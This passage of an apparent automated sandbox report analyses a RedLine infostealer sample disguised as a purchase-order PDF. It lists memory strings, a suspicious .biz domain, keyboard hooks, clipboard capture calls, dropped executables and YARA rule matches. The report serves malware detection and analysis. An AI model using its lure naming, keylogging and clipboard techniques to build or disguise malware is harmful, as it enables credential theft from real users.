                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                            Source: build.exe, 00000007.00000002.2559158756.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: microsofts.exe, 00000005.00000003.2574053631.0000000006930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                            Source: alg.exe, 00000009.00000002.3323934646.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zyiexezl.biz/
                            Source: powershell.exe, 0000000A.00000002.2200928108.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                            Source: Native_Redline_BTC.exe, 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://api.ip.sb/ip
                            Source: microsofts.exe, 00000005.00000003.2636300214.0000000006930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                            Source: microsofts.exe, 00000005.00000003.2637476112.0000000006930000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2638010693.0000000006930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Installs a global keyboard hook
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\microsofts.exeJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00459FFF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0047C08E

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 5.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 4.2.svchost.exe.5600000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Initial sample is a PE file and has a suspicious name
                            Source: initial sampleStatic PE information: Filename: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004364AA
                            Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\97dd988331e417df.bin
                            Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00409A400_2_00409A40
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004120380_2_00412038
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004271610_2_00427161
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0047E1FA0_2_0047E1FA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004212BE0_2_004212BE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004433900_2_00443390
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004433910_2_00443391
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0041A46B0_2_0041A46B
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0041240C0_2_0041240C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004465660_2_00446566
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004045E00_2_004045E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0041D7500_2_0041D750
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004037E00_2_004037E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004278590_2_00427859
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004128180_2_00412818
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040F8900_2_0040F890
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0042397B0_2_0042397B
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00411B630_2_00411B63
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0047CBF00_2_0047CBF0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044EBBC0_2_0044EBBC
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00412C380_2_00412C38
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044ED9A0_2_0044ED9A
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00423EBF0_2_00423EBF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00424F700_2_00424F70
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0041AF0D0_2_0041AF0D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553E6100_2_0553E610
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00409A403_2_00409A40
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004120383_2_00412038
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004271613_2_00427161
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0047E1FA3_2_0047E1FA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004212BE3_2_004212BE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004433903_2_00443390
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004433913_2_00443391
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0041A46B3_2_0041A46B
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0041240C3_2_0041240C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004465663_2_00446566
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004045E03_2_004045E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0041D7503_2_0041D750
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004037E03_2_004037E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004278593_2_00427859
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004128183_2_00412818
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0040F8903_2_0040F890
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0042397B3_2_0042397B
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00411B633_2_00411B63
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0047CBF03_2_0047CBF0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044EBBC3_2_0044EBBC
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00412C383_2_00412C38
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044ED9A3_2_0044ED9A
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00423EBF3_2_00423EBF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00424F703_2_00424F70
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0041AF0D3_2_0041AF0D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B15F03_2_057B15F0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B0D5804_2_04B0D580
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD7F804_2_04AD7F80
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B037804_2_04B03780
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B0C7F04_2_04B0C7F0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B100D94_2_04B100D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B139A34_2_04B139A3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD6EAF4_2_04AD6EAF
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B059804_2_04B05980
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD51EE4_2_04AD51EE
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD7B714_2_04AD7B71
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_0162DC747_2_0162DC74
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4F5887_2_05B4F588
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4D5707_2_05B4D570
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4E4807_2_05B4E480
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4A4E87_2_05B4A4E8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B497887_2_05B49788
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B45FF07_2_05B45FF0
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4C7C87_2_05B4C7C8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4CE087_2_05B4CE08
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B1287_2_05B4B128
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B481687_2_05B48168
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B8787_2_05B4B878
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4EBB87_2_05B4EBB8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4A4D97_2_05B4A4D9
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4E46F7_2_05B4E46F
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4C7BA7_2_05B4C7BA
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B44FD87_2_05B44FD8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B457207_2_05B45720
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B477287_2_05B47728
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B497787_2_05B49778
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4CE077_2_05B4CE07
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B1187_2_05B4B118
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4815A7_2_05B4815A
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B418D87_2_05B418D8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B8697_2_05B4B869
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B402E07_2_05B402E0
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B402D07_2_05B402D0
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 8_2_014585C88_2_014585C8
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 8_2_014585B78_2_014585B7
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006A7C009_2_006A7C00
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006CA8109_2_006CA810
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006D2D409_2_006D2D40
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006A79F09_2_006A79F0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006C92A09_2_006C92A0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006CEEB09_2_006CEEB0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006C93B09_2_006C93B0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_046CB49010_2_046CB490
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 00425210 appears 58 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 00445975 appears 130 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 0041171A appears 74 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 0041832D appears 52 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 004136BC appears 36 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 004092C0 appears 50 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 0041718C appears 90 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 00401B70 appears 46 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 0040E6D0 appears 70 times
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: String function: 0043362D appears 38 times
                            Source: Acrobat.exe.5.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                            Source: chrmstp.exe.5.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                            Source: chrmstp.exe.5.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: Number of sections : 13 > 10
                            Source: chrmstp.exe.5.drStatic PE information: Number of sections : 14 > 10
                            Source: elevation_service.exe0.5.drStatic PE information: Number of sections : 12 > 10
                            Source: elevation_service.exe.5.drStatic PE information: Number of sections : 12 > 10
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074370373.000000000429D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.00000000040F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2104936203.0000000004193000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2105107664.000000000433D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: 5.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
